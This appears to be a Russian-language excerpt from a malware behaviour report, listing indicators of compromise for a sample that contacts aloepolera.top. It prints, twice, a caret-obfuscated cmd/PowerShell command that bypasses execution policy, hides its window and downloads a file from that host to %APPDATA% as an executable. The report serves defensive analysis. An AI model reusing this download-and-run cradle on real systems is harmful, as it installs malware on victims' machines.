Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^w^e^RS^heLL.^eX^E -exEc^UTIO^n^p^OLI^c^Y B^y^p^a^Ss^ -^NOpROFiLE^ -wInD^O^WSTYLe HI^dDeN (nE^W^-^ObJeCt^ ^sY^Ste^M.n^E^T.^w^Eb^c^liENT).^dow^nl^Oa^DFILE^('http://aloepolera.to...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "PO^w^e^RS^heLL.^eX^E -exEc^UTIO^n^p^OLI^c^Y B^y^p^a^Ss^ -^NOpROFiLE^ -wInD^O^WSTYLe HI^dDeN (nE^W^-^ObJeCt^ ^sY^Ste^M.n^E^T.^w^Eb^c^liENT).^dow^nl^Oa^DFILE^('http://aloepolera.to...' (со скрытым окном)